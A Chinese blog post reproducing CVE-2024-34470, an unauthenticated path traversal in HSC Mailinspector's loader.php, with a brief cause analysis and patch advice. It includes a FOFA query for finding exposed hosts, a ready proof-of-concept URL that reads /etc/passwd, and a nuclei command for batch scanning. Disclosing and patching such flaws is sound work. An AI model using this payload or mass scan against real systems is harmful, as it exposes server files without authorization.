#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。

目录

[HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)](#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470))

0x01漏洞概述

0x02漏洞复现

0x03漏洞分析

0x04修复建议

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

HSC Mailinspector 是一种邮件安全解决方案,旨在保护企业和组织免受各种电子邮件威胁的影响。它提供了一系列功能,包括针对垃圾邮件、恶意软件、垃圾邮件和其他网络威胁的过滤和检测。

在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之间发现了一个问题。在 /public/loader.php 文件中存在一个未经身份验证的路径遍历漏洞。path参数没有正确过滤传递的文件和目录是否属于 Web 根目录,这使得攻击者能够读取服务器上的任意文件。

受影响版本

HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影响。

CVE编号

CVE-2024-34470

0x02漏洞复现

fofa

body="mailinspector/public"

1.poc

https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

构造如上payload,将target-IP替换成目的IP,在浏览器或burp中打开,即可查看目标系统的文件。

2.批量检测poc

使用nuclei,下载地址:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml

使用命令,nuclei.exe -t CVE-2024-34470.yaml -l 1.txt

0x03漏洞分析

这个漏洞的成因是在/public/loader.php文件中存在path参数没有正确过滤传递的文件和目录是否属于网络根目录,从而允许攻击者读取服务器上的任意文件。

0x04修复建议

1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://hsclabs.com/mailinspector/

2.限制用户权限,避免授予过高的权限。

3.实施严格的访问控制和身份验证机制,以防止未经授权的访问

相关推荐
mCell2 小时前
从删库到跑路?这50个Linux命令能保你职业生涯
linux·windows·macos
杰克逊的日记2 小时前
GPU运维常见问题处理
linux·运维·gpu
PAK向日葵3 小时前
【算法导论】如何攻克一道Hard难度的LeetCode题?以「寻找两个正序数组的中位数」为例
c++·算法·面试
誰能久伴不乏3 小时前
Linux系统调用概述与实现:深入浅出的解析
linux·运维·服务器
程序员学习随笔4 小时前
Linux进程深度解析(2):fork/exec写时拷贝性能优化与exit资源回收机制(进程创建和销毁)
linux·运维·服务器
mmoyula4 小时前
【RK3568 PWM 子系统(SG90)驱动开发详解】
android·linux·驱动开发
-SGlow-4 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
代码改变世界ctw5 小时前
Linux内核设计与实现 - 第14章 块I/O层
linux·运维·服务器
终焉暴龙王6 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
huoyingcg6 小时前
武汉火影数字|数字党建展厅制作 VR红色数字纪念馆 党史馆数字化打造
科技·ar·vr·虚拟现实·增强现实